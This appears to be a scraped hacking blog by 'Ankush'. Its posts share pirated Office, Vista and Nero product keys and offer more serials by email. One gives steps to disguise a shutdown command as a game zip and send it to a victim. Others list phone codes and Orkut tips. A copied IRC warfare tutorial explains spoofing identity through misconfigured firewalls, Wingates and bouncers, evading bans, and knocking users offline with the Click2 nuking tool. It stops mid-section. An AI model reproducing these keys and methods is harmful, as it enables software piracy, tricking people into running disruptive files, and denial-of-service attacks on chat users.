ANKUSH
Tools Hacking By Bebytza_[ankush]BrT
ANKUSH
MS OFFICE 2010 BY ANKUSH (NEW)
x86
774GJ-X3942-9GTKT-FWYJ9-KM77K

x64
4F3B6-JTT3F-VDCD6-G7J4Q-74W3R
2MHJR-V4MR2-V4W2Y-72MQ7-KC6XK



***Microsoft Office Professional Plus 2010:

22HGX-728MX-BBWX9-7BB8X-J96B4



***Visio Premium 2010:

PQCFB-YGXGC-TXB66-DH3VW-GCGYQ



***Project Professional 2010:


CQYRY-3KBR3-JW34C-VGH7M-MQM49


>>>>>>>>>>>>>>>>>>>>>>>>>
MS OFFICE 2007 KEYS BY ANKUSH

JMPQ9-QM9GG-99FX6-8KBRR-6BVD8

KYY93-FW482-G48PG-K9YYB-QBDQ8

DYY34-CPVPT-PDVWM-TG8KJ-2WK38

FTMB3-QQKKH-CDB64-3YDD3-XWRMJ

HV9WD-9RBPG-D6822-KP6W6-9X4MJ

WCRXW-M798H-PMGQ9-TQ4XG-XTPVW

KGFVY-7733B-8WCK9-KTG64-BC7D8


****Microsoft® Office Professional 2007

HCBDR-23TM6-CB8HH-4RQBT-TMCFJ



***OFFICE 2007 PRO

TT3M8-H3469-V89G6-8FWK7-D3Q9Q

VB48G-H6VK9-WJ93D-9R6RM-VP7GT

HCFPT-K86VV-DCKH3-87CCR-FM6HW


***office2007 enterprise BY ANKUSH

H86Q7-F86BG-KBWRQ-YQXQH-HD3Q8

***office2007 60 day trial BY ANKUSH

T3PVR-XX42X-T49DW-WGBG6-9FT73

***OFFICE XP BY ANKUSH

FM9FY-TMF7Q-KCKCT-V9T29-TBBBG

***OFFICE XP CD KEYS BY ANKUSH

BJJ36-X7TH2-9D7M9-P5TG4-XP7DM

fm9fy-tmf7q-kckct-v9t29-tbbbg

***MS Office Professional 2003 Serial BY ANKUSH

GWH28-DGCMP-P6RC4-6J4MT-3HFDY

***Microsoft Office FrontPage 2003, One Note 2003, Visio Note 2003 y Project Professional 2003

by ANKUSH\\

CD-KEY: WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM

ENJOY HACKING[ANKUSH]
***IF U WANT THE SERIAL OF ANY SOFTWARE THEN MAIL ME AT ankuraja@gmail.com


Labels: 10 comments | | edit post
ANKUSH
Vista Genuine Keys by ANKUSH

Windows Vista Business:
6QQW2-XHVBY-3P47M-TQDY2-CDWYY
PVK4K-49YX6-VX4Q4-JQJT6-8Q3JC
FJG7P-8M32X-JQ4P4-BYMHG-JKWJC

Windows Vista Home Premium:
KG843-7KP9F-WY989-X7PV3-DPX2P
2KTJJ-RVD7C-2KM4D-9VDPR-WJ6Q2
H2H8G-DMC9W-XCPYW-BBHQP-RGP47

Windows Vista Ultimate:
TTVGK-T3YYP-HGHF6-B998H-92XRR
7RTRH-FQGFR-3VYBC-H6DCH-C6HJW
RB66W-M3HPP-999B8-MXGWY-XFJF8
>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vista|Ultimate|Acer|3YDB8-YY3P4-G7FCW-GJMPG-VK48C

Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4F

Vista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCH

Vista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTR

Vista|HomeBasicN|Acer|22TC9-RDMDD-VXMXD-2XM2Y-DT6FX

Vista|HomePremium|Acer|2TYBW-XKCQM-XY9X3-JDXYP-6CJ97

Vista|Starter|Acer|26VQB-RP3T9-63FVV-VD7RF-H7M2Q

Server|SBS|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Business|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Enterprise|Dell|26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ

Server|Standard|Dell|223PV-8KCX6-F9KJX-3W2R7-BB2FH


Labels: 4 comments | | edit post
ANKUSH
NERO 9.0.9.4c BY ANKUSH(NEW)

download nero 9 (torrent)

9M03-019A-X6AM-Z365-28EH-AX3K-LL1X-19HP


nero 10 activation

download nero 10(torrent)

1E30-AXC1-19M2-94KK-520A-CK81-83E4

ENJOY HACKING[ANKUSH]

IF U WANT THE SERIAL OF ANY SOFTWARE THEN MAIL ME AT ankuraja@gmail.com


Labels: 1 comments | | edit post
ANKUSH
I was asked by many people to tell me the way to protect your orkut account.PLese reply and show your feed backThis Simple Tutorial will Save you from Spam mails and Hacking Tricks used by Many hackers.
As you know you can hide your primary email address from non-friends but if by mistake you add a unknown person to your friend list, then he/she will be able to see your primary email address which you use to login. He can send dangerous emails (keyloggers etc.) and steal your Orkut account. There are two Methods to be safe:


1. Changing Primary Email:
Go To Edit Profle Page of your profile, then click on COntact tab and change your Primary Email address to some other id, which you don't use much. Your login id will remain same but your friends will see your other email id.

2. Using Fake EMail id:
It is the most effective way of hiding email id, but it requires a new account, If you have some larger communities and want safety, then follow this method:

Create a new Orkut account, On the Sign Up page enter any id which does not exist like yourname@yourname.com, me@orkutaccount.com etc.
Then after entering other details, you will be redirected to your home page and with a message "Verify Your Email", Just igonore it and do as stated below
Now Go to google.com, you will see your fake id on the top-right corner yourname@yourname.com, You can see "My Account" Option there.
Go To "My Account Page" and create a gmail id from there. (You can see it under Try Some More)
Done! You have your new login id but your friends will still see your fake id :| Enjoy

enjoy hacking[ankush]
Labels: 1 comments | | edit post
ANKUSH
Many people asked me to write a post about on Registry hacks,so here is the post on "How to rename recyclebin"

You can rename recycle bin by following method:


1-Click Start menu > Run > and type “regedit” (without quotes), to run Windows Registry Editor

2- Find and go to following “HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}”

3- Change the name "Recycle Bin" to whatever you want

enjoy hacking [ankush]
Labels: 0 comments | | edit post
ANKUSH
1) Right click on desktop, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" or anything of your choice

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

After you have given it a name click on finish.
You should now have an icon on your desktop that is called "Hack msn" or whatever name you gave it.
It is also advised you change the icon to something different,So the victim fall for it.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone to shutdown their pc while chatting

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it yourself.

Ok go to start, run type cmd, then in cmd type: shutdown -a.

enjoy hacking[ankush]
Labels: 0 comments | | edit post
ANKUSH
==================================
Nokia Secret Codes by Ankush Kumar
==================================


On the main screen type in:

*#06# for checking the IMEI (International Mobile Equipment Identity).

*#7780# reset to factory settings.

*#67705646# This will clear the LCD display(operator logo).

*#0000# To view software version.

*#2820# Bluetooth device address.

*#746025625# Sim clock allowed status.

#pw+1234567890+1# Shows if sim have restrictions.

*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)

*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.

*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.

*#4720# - Half Rate Codec activation.

*#4720* - Half Rate Codec deactivation. The phone will automatically restart

If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#

Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345

Press *#3925538# to delete the contents and code of wallet.

Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
*#7328748263373738# resets security code.

Default security code is 12345

Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.


Code Function
*3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%
#3370# Deactivate Enhanced Full Rate Codec (EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec

#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
12345 This is the default security code

*#21# Allows you to check the number that “All Calls” are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the “Call Waiting” status of your phone.
*#61# Allows you to check the number that “On No Reply” calls are diverted to
*#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to
*#67# Allows you to check the number that “On Busy Calls” are diverted to

*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
*#9999# Phones software version if *#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)

*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed", it means you will get the best standby time possible
*#94870345123456789# Deactivate the PWM-Mem
press and hold # Lets you switch between lines

*#7760# Manufacturers code
*#7780# Restore factory settings
*#8110# Software version for the nokia 8110
*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again

**21*number# Turn on “All Calls” diverting to the phone number entered
**61*number# Turn on “No Reply” diverting to the phone number entered
**67*number# Turn on “On Busy” diverting to the phone number entered


Nokia Secret Codes
The complete guide

Here's a list of known codes on Nokia mobile phones. This list does not include codes that make request to the network. To use these codes, just dial them like normal numbers.

Code Description
*#06# Display the IMEI (GSM standard)

*#0000# Display the firmware version and date (with variant info on S40 second edition or newer)

*#9990# Says "Bluetooth Test Mode" on Symbian models; accepts without any messages and Bluetooth behaves abnormally on non-Symbian ones (models with build-in Bluetooth radio, activate first to use)

*#bta0# Display the Bluetooth MAC address (models with build-in Bluetooth radio, activate first to show address)

*#mac0wlan# Display the WLAN MAC address (models with build-in Wi-fi radio)

*#opr0logo# Clear the operator logo (3310 and 3330 only)

*#pca0# Activate the GPRS PCCCH support (early GPRS models)

*#pcd0# Deactivate the GPRS PCCCH support (early GPRS models)

*#res0wallet# Reset the mobile wallet (models with mobile wallet)

*#res0# Soft-format the memory (Symbian models only)

*#rst0# Reset to factory defaults, confirmation required (DCT4 or newer)

*#sim0clock# Display the SIM clock status (DCT3 only)

*#ssn0# Display the manufacturing serial number (mid-range and premium DCT3, basically all DCT4 and BB5 non-Symbian models)

*#war0anty# Display the manufacturing and repair info (no exit on DCT3) or total talk time on

Symbian models

*efr0# Enable EFR encoding (pre-2003 models)

#efr0# Disable EFR encoding (pre-2003 models)

*hra0# Enable HR encoding (pre-2003 models)

#hra0# Disable HR encoding (pre-2003 models)

#pw+1234567890+n# Display the SIM lock status: (pre-2003 models)

n = 1: provider lock
n = 2: network lock
n = 3: country lock
n = 4: SIM lock
n# n = 1..999: recall the number stored in the SIM location n (DCT3, DCT4, BB5 models)


These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu

One useful function that all Nokia’s I’ve owned have is “Cell Info Display” which can usually be found in the phones “Display settings” (eg: in a Nokia 1600) or “Phone Settings” (eg: in a Nokia 3315)

If your network supports it, when “Cell Info Display” is enabled, it will display the name of the base station your mobile is currently connected to on the screen. eg: when i’m walking around the city it says “Sydney CBD” and when i’m at home it displays the name of my suburb.

Note:

To display “p” press “*” three times within one second, To display “w” press “*” four times within one second, To display “+” press twice “*” within less than a second

Code Function

*3370# / #3370# Activate / Deactivate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

*#4720# / *#4720# Activate / Deactivate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#7220# / *#7230# Enable / Disable PCCCPH support (faster GPRS)


#pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+4# SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

12345 This is the default security code

*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type

*#9999# Phones software version if *#0000# does not work

*#06# For checking the International Mobile Equipment Identity (IMEI Number)

*#67705646# Removes operator logo on 3310 & 3330

*#73# Reset phone timers and game scores

*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
press and hold # Lets you switch between lines

*#7760# Manufacturers code

*#7780# Restore factory settings

*#8110# Software version for the nokia 8110

*#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again

enjoy hacking [ankush]
Labels: 2 comments | | edit post
ANKUSH
Trick 1:

1. Open Control Panel -> Networking and Sharing Center -> Manage Network Connection.

2. Now a window showing all networks will be opened. Select BSNL Connection -> Right click -> Properties.

3. Now, double click on Internet Protocol Version(TCP/IPv4) and in newly opened window at bottom, select “Use the following DNS Server address” .

4. And fill these 2 DNS Addresses in two fields:

208.67.222.222

208.67.220.220

and hit OK. Thats it. Your BSNL Internet Broadband DNS Servers changed.

ENJOY HACKING

[ANKUSH KUMAR]
Labels: 0 comments | | edit post
ANKUSH
ANKUSH

To see this:

Type this in your note:

bold

bold

italics

italics

underline

underline

strikethrough

strikethrough

Big size

Big size

Small size

Small size

An em-dash—see?

An em-dash—see?

Hyperlink to Facebook

Hyperlink to Facebook

A Bulleted List:

· One Item

· Another Item

A Bulleted List:


  • One Item

  • Another Item

An Ordered List:

1. First Item

2. Second Item

An Ordered List:


  1. First Item

  2. Second Item

The following quote is special:

Because it is indented

The following quote is special:

Because it is indented

Heading 1

Heading 2

Heading 3





enjoy hacking


post comments[ankush]

Heading 1



Heading 2



Heading 3

Labels: 0 comments | | edit post
ANKUSH


The count down timer:

This is one of the best method to bypass rapidshare download timer.

1. Click the RapidShare download link

2. To start the download click on the free button at the bottom of the screen.

3. Copy and paste this code in to the web browser url bar:

javascript:alert(c=0)



You can also bookmark this by doing the normal bookmark/fav process and then just entering that code instead of the website.

4. Press enter

This should set the timerlimit to zero. it is also possible to Add that link to your Favorites/bookmarks.

enjoy hacking

post comments[ankush]
Labels: 0 comments | | edit post
ANKUSH

In this world everyone want to know the shortcut of Keyboard for expediting the work.Here are some of the shortcuts of using Orkut on Firefox explorer.

These shortcut have been personally tested by our professionals.Please note.

· Home: Ctrl + Shift + H

· Scrapbook: Ctrl + Shift + S

· Communities: Ctrl + Shift + C

· Friends: Ctrl + Shift + F

· Edit Profile: Ctrl + Shift + E



ENJOY HACKING



POST COMMENTS[ANKUSH]

Labels: 0 comments | | edit post
ANKUSH

It is really a hot news that orkut has announced new orkut desings which are really easy to add. The desings are however not accessible without invitation. Follow our guidelines to get invitations.

You need to find a friend who is already a user of the new orkut, to identify your friends who are using new orkut feature, see whether the orkut round icon appears next to their names or not. An alternative way is to join the Official Community of Orkut from where you'll automatically get invitation after few days. The link of Orkut Official Community is as follows
http://www.orkut.co.in/Main#Community?cmm=95114051


enjoy hacking


post comments[ankush]

Labels: 0 comments | | edit post
ANKUSH

There are many users who have problem in using Multiple Accounts on Yahoo, Orkut, Gmail while using Google Chrome .

There is a mode on Google Chrome Known as Incognito mode (a private browsing feature of the Google Chrome browser).The pages of the web that we open and download files are not recorded while you are browsing and downloading histories and cookies are deleted after you close the window.To turn On this feature Incognito mode you just have to pressCtrl+Shift+N or otherwise just press setting which is like (wrench) .It is at the top right side of browser and select New incognito window . This allows you to use Multiple Account options on your Browser.


enjoy hacking


post comments[ankush]

Labels: 0 comments | | edit post
ANKUSH

Do you Face problem while sending your scraps to your favourate freind, do you want to deliver your message in any case?

If yes then you are able to do this on send message feature, this feature help orkut person to deliver there message even if there scrapbook is blocked .
You can send messege to any friend.You just have to click send message.This link is available at left side of your friends orkut profile.Write the message and send it yours friends.

Labels: 2 comments | | edit post
ANKUSH

Table Of Contents]

  1. What is IRC?
  2. An introduction to the way that IRC works
  3. Some notes on different IRC networks and their daemon software
  4. Why IRC wars started?
  5. What do the others know about me?
  6. How to spoof / hide your identity on the IRC
  7. Bans and how to bypass them
  8. I don't like your nickname... / Getting a user off the IRC
  9. Can I get caught and will I?
  10. What are netsplits and how can they help me?
  11. Channel Takeovers
  12. How To Completly Ruin A Channel
  13. Some expansion about RAW sessions
  14. Faking /ctcp replies
  15. How to spoof via https proxys
  16. War Scripts
  17. Editorial - IRC wars, another perspective
  18. Some interesting articles by Packet
  19. Bibliography
[What is IRC?]
IRC stands for "Internet Relay Chat". Jarkko Oikarinen originally wrote it in 1988. Since starting in Finland, it has been used in over 60 countries around the world. It was designed as a replacement for the "talk" program but has become much, much more than that. IRC is a multi-user chat system, where people meet on "channels" (rooms, virtual places, usually with a certain topic of conversation) to talk in-groups, or privately. There is no restriction to the number of people that can participate in a given discussion or the number of channels that can be formed on IRC.

[An introduction to the way IRC works]
All the communications in the world of IRC are done through the server. (This does not includes the DCC (Direct Client Communication) protocol)
When you connect to a server, you send it 2 commands: NICK & USER. These commands are used to identify you on the IRC. Here is the format of the commands:
NICK nickname - Sets your nickname
USER username host server :real name - Set your userid and real name. Host is your host and server is the server you are connecting to.
For example to open a raw IRC session you can telnet to an IRC server on port 6667 or 7000 (the standard ports). Here is an example for telneting my localhost (note: the lines beginning with * have been written by me. The rest are the output I got from the server):
* nick ^TCG^
NOTICE ^TCG^ :*** If you are having problems connecting due to ping timeouts, please type /notice E3AA3478 nospoof now.
PING :E3AA3478
* user ^TCG^ 127.0.0.1 localhost :The Cyber God
:localhost 001 ^TCG^ :Welcome to the DALnet IRC Network ^TCG^!~tcg@thegod.actcom.co.il
:localhost 002 ^TCG^ :Your host is localhost[thegod.actcom.co.il], running version dal4.6.7.DreamForge.win32
:localhost 003 ^TCG^ :This server was created Fri Jul 24 07:48:52 1998
:localhost 004 ^TCG^ localhost dal4.6.7.DreamForge.win32 oiwsghOkcfrRaAb biklmnopstvR
:localhost 005 ^TCG^ NOQUIT TOKEN WATCH=128 SAFELIST :are available on this server
:localhost 251 ^TCG^ :There are 0 users and 0 invisible on 1 servers
:localhost 253 ^TCG^ 4 :unknown connection(s)
:localhost 255 ^TCG^ :I have 0 clients and 0 servers
:localhost 265 ^TCG^ :Current local users: 0 Max: 0
:localhost 266 ^TCG^ :Current global users: 0 Max: 0
:localhost 422 ^TCG^ :MOTD File is missing
:^TCG^ MODE ^TCG^ :+iw
...

ok

As you can see, the second parameter of the USER commands includes my IP. You might be thinking right now that you could enter any IP you want and fake your IP. Well you are wrong. On really older versions of the IRC daemon (Those that were used in Efnet), you WAS able to spoof your IP. But today there are 2 types of antispoof-patches: The one that doesn't care about the IP you entered and connects you using your real IP (which it gets from the socket) and the other one just doesn't allow you to connect to the server until you give your real IP address.
The first method of Anti-Spoofing is most used most in the server version of DALnet and the second is used most by EliteIRCD (which is based on DALnet) and the servers that are based on it.
Now, if it all goes ok then you just opened a raw session to IRC!
All the data transferred to the user (Private Messages/Notices and Channel Events) is transferred from the server. If the user that sent you a message is on a DIFFERENT server than you (but NOT a different network) the message "moves" from the servers until it reaches your server and you. To send someone a message in our raw IRC session type: 'PRIVMSG nick :message' (without the quotes) where nick is the target nickname and message is the message (You must include a : before the message).
When a message moves from server to server it looks like this:
:SenderNick PRIVMSG nick :message
All the IRC commands move from server to server like this. For example when someone uses the NICK command ALL the servers get a notice about it.

[Some notes on different IRC networks and their daemon software]
Different IRC networks have different IRC daemons. It is important to know the futures / limits of the server your network uses. For example, OLD Efnet servers don't know the +b channel mode (ban someone). When trying to start IRC wars you need to know what are the limitations of the server. If it got services, if so does they have a bug that can crash them? Can you obtain Channel Operator in a net-split (we'll get to that)? And so on... During the rest of this tutorial we will discuss different daemon software and bugs, as well as different ways to "get in".

[Why IRC wars started?]
Generally, IRC wars started on the IRC network Efnet. In this IRC network you can't register your nickname so ANYONE can use it. If for example someone logged to this IRC network (By the way, did you know that it is the first IRC network ever (!)) and he saw that his nick is taken. He probably said something like "How Rude?!" or "Mother-F*cker" or anything else. Then he started thinking about ways to get this user off the server. Users started to try many different things on each other and that's pretty much how IRC wars started. Today, users might start IRC wars "just for fun", or for taking over channels they don't like or kicking off users they don't like.

[What do the others know about me?]
OK people! This is actually the first important thing about the IRC wars. Before starting out you need to know what others can find out about you and what can you find out about them.

If you are not connected through a BNC, firewall or a shell (we'll get to this neat stuff later), what I mean, that if you are connected directly to the IRC, using a dial-up for example users can first of all knows your IP. Newbies might say right now, ok... well.... So he knows my IP... who gives a shit anyway?
Well if you said this you are wrong. Let's take a look on my host (resolved IP) for example:

P34.haifa2.actcom.co.il  |    |        |      |_ You can see that my ISP is in Israel, and so am I (unless  |    |        |         I'm dialing to foreign ISPs just to cover my identity, which   |    |        |         is a thing people don't do because of... financial issues).  |    |        |_ You can see that my ISP (Internet Service Provider) is Actcom  |    |_ You can see that I am from Haifa ).  |_My modem number at the ISP's office.
See how many things the host gave you?
1) My ISP
2) My city
3) My country
Now You can also know that if my ISP address is actcom.co.il you can send complains about me to abuse@actcom.co.il for example, give them my IP and tell them what I did to you and they will do the rest.

That is what users know about you. Some times you will only see numbers like 19.114.47.1 and not the host. That is because the server failed to resolve your hostname. To resolve it you can download a program called 'nslookup' from somewhere (note: nslookup comes with all Unix systems), give it the IP and it will try to resolve it. Also see the entry 'DNS Servers' in the Newbies Corner.
Now, for those who don't know you can get the IP/host by "whoising" the user.
To do a whois on a user in mIrc, BitchX, IRCii, Pirch and some other known IRC clients all you need to do is type /whois nickname
To whois someone in our raw connection (the one I taught you how to establish at the beginning) type 'whois nickname' (without the quotes)
Here is what I get when I whois my self in the raw connection:
whois ^TCG^
:localhost 311 ^TCG^ ^TCG^ ~TCG thegod.actcom.co.il * :The Cyber God
:localhost 312 ^TCG^ ^TCG^ localhost :test server
:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time
:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.
Ok, before I explain what you got here, here is the format:
Format: :server-name raw-number sender target data.
Server-name is the server that gives you the data.
Raw-number is the ID of the data you got (it is used to determine what data you are getting).
Sender: the senders nickname (you!!).
Target: The target (The nick you are whoising).
Data: The data.
Now here is an explanation on all the 4 lines
In the first one you see the user-name and the host of the user, you also see his real name:

~TCG thegod.actcom.co.il * :The Cyber God    |     |                         |_ The user's real name (you can fake this :))    |     |_ The user host or IP    |    |_ The username (set by IdentD, will be explained later,       when followed by a '~' you see that the IdentD is NOT        running and the Ident (username) might be fake).
The second line:  localhost :test server      |             |_ Comment about the server (set by the server admin)      |_ The server that user is connected to
Third line:  9 932030074 :seconds idle, signon time  |      |_When the user signed in  |_ How many seconds has he been idle
Last line:  :End of /WHOIS list.       |_ Shows you that there is no more data.
Also, when users know your IP they can start almost any Denial of Service (DoS) attack on your host like WinNuke (Arggg... Lame Lame Lame!!!) or a lovely ping flood that will chew up all of your bandwidth, depending on the attacker's bandwidth (for more info and more sophisticated DoS attacks, see the DoS tutorial at blacksun.box.sk).

[How to spoof / hide your identity on the IRC]
After seeing what users can find out about you, it is time to learn how to hide your identity.

There is no easy and lame way to do this. Here are the most knows ways: FireWall, WinGate and a Bouncer aka (As Knows As) BNC.
We will start from the firewall.
The firewall we are talking about is software that runs on some machine and is used to filter incoming packets (packets that arrive to the machine which is running the firewall) and outgoing packets (packets that are sent from the machine which is running the firewall). Some firewalls are not configured very well and allow anyone to connect to them. The hard part is to find a working one that will allow you to use it to connect through it, and once you are connected, using it so users that will whois you or dns you will see the firewall's IP! If, for example, there is a misconfigured FireWall on the host firewall.someone.com, you can use it in mIRC, for example, by starting the mIRC program (I use the newest version 5.6, go download it at www.mirc.co.uk) and:
1. Click on the Files menu, then Options.
2. On the topmost label of the tree where you can see 'Connect', If you see a '+' next to it click it. If you see a '-' go to the next step
3. Click on the sub-item Firewall (duh...)
4. Be sure the 'Use SOCKS firewall' checkbox is marked (has an 'X' in it).
5. In the Hostname field, write the IP / Hostname of the firewall. For example lets use firewall.someone.com
6. Leave the USER ID and PASSWORD empty, and make sure the port in 1080.
7. Click OK.
Now, next time you will type /server ... To connect to the IRC server the connection will be relayed through the firewall, so if someone will whois you he would see something like this:

:localhost 311 ^TCG^ ^TCG^ ~TCG firewall.someone.com * :The Cyber God
:localhost 312 ^TCG^ ^TCG^ localhost :test server
:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time
:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.

You can see that my host is NO LONGER thegod.actcom.co.il, instead it is now firewall.someone.com!!
Now I am protected. You might be asking right now where to get the firewalls hosts. One idea is go asking your friends. Other is going to Altavista (www.altavista.com) and searching for "firewall AND list" and stuff like that.

Another way of spoofing your IP is a WinGate. WinGate is software for Windows that is used to let several computers that are connected through a local network of some sort to use one computer's Internet access. It also allows you to fake your IP _EXACTLY_ the same way. After installing WinGate, anyone will be able to use it if you don't configure it well (I personally recommend using SyGate instead). To find Wingate addresses you can ask your friends, run a Wingate scanner that will scan whole subnets for Wingates or look for lists on the web.

Note: newer versions of the IRC daemons will automatically check for an open Wingate or a firewall, and if they will detect one they will kill your session and might even K-Line (Ban the host from using the server/network) the host as well.

Now, on to the Bouncer (aka BNC) spoofing.
Bouncer is software that runs on Unix computers. If, for example, there is a BNC on bnc.shell.com on port 1234, you can connect to it by typing: /server bnc.shell.com 1234
After that you should be getting something like this:
-BNC- Please type your password via /quote pass
Crap... You need a password. If you know the password you have no problem. Just type '/qoute pass password' (without the quotes), and replace 'password' is your password.
If you don't know the password you need to ask the guy that gave you the BNC (or you could always hack the server... ;) but this tutorial is about IRC warfare, not hacking servers and getting passwords). You should also ask him if it (the BNC) has vhosts. Vhosts are multiple IPs and hostnames for the same BNC. If it has vhosts, you can set your active host by typing '/quote vip the.host.name.here' (as you should be able to figure by now, it is done without the quotes).

After this you type '/conn server'. For example /conn irc.dal.net will connect you to irc.dal.net with the bouncer's host.

Note: unlike firewalls and badly configured Wingates, the server cannot detect a BNC, so there is no chance you will be banned for using it.

[Bans and how to bypass them]
Channel Operators might ban you after you have done something in their channel that made them angry :( .
To bypass a ban you first need to know the ban type. There are a few ban types:
1. nick!*@* - Bans you by your nickname. All you need to do is change your nick (by typing /nick newnick, or in raw session NICK newnick) and you can reenter the channel.
2. *!user@* - Bans you by your Ident (UserID). If your computer is not running an IdentD daemon (A win9x with mIRC for example) you can easily change your Ident by clicking on the File menu, selecting Options, opening the 'Connect' sub-tree, clicking the IdentD label and changing the User ID. If you are under a Unix / Linux machine that is already running an IdentD daemon, you can't change it because it automatically sets your ident username to your login name. To change this you need to logon to the IRC through a Bouncer because bouncers fake you IdentD.
3. *!*@host - You are banned by your IP / host. All you need to do is to connect through a firewall or a Wingate.
Some times the bans are more complex like ^TCG^!*@*.actcom.co.il.
This ban will prevent anyone named ^TCG^ with host that ends with .actcom.co.il
If you are interested here is the format:

Nick!user@host / IP   |    |      |_ The IP or hostmask.   |    |   |    |_ Your username. The IdentD sets this. When running IdentD daemon it   |       mostly not faked but when running windows or connection through a    |       bouncer it is probably faked.   |   |_The user nickname. If might also contain wildcards like *T*C*G*.     This will prevent anyone with the letters T, C and G (in this order)      to join the channel.
Examples: ^TCG!*@*.actcom.co.il               | |      |_________The server               | |_Your Ident user (defined as the wildcard '*', meaning ANYTHING)               |_Your nickname
As you probably know, channels have different modes. For example +o to make a certain person an OP (Operator), +b to ban a person etc'. To set a ban you type: /mode #Channel +b nick!user@host and to remove a ban you type /mode #Channel -b nick!user@host
On a raw session you don't need the '/'.

[I don't like your nickname... / Getting a user off the IRC]
The easiest way to get a user off the IRC is using a program called "Click2" for Windows.
If might not always work and it is considered extremely lame, but it might work sometimes.
After you got this program, do the following:
1. Set the "Packets to:" option box to "Clinet"
2. In the Server textbox fill-in the TARGET server. You can figure it out by doing a /whois or a /dns on the target's nickname.
3. In the Client textbox fill-in the TARGET IP address. You can also figure this by doing a /whois or /dns on him but if he uses any spoofing technique like a BNC or a Wingate it won't harm him even a bit (it may harm the Wingate / Firewall / BNC, though).
4. Be sure that you set it to send 64 packets every 1000ms in the 2 textboxes at the end of the window.
5. The client start port should be 1024 and the stop 1500.
6. Now hit nuke....
This is what you will see if it worked and you were in a channel, and the target in also in this channel:
*** Quits: ^TCG^ (Connection reset by peer)
(Or something likes this)

The target should see something like this:
*** [10053] Software caused connection abort

If it is not working, you won't see anything and he won't either. If he is running some packet-logger that logs ICMP packets he will see your IP but most users do not run these.

Another lame way is to try winnuking the address. I won't explain here how to do it and what winnuke is because it has nothing to do with this tutorial (see R a v e N's DoS tutorial for Winnuke information, as well as information on more sophisticated attacks).

Here is a more complex way.
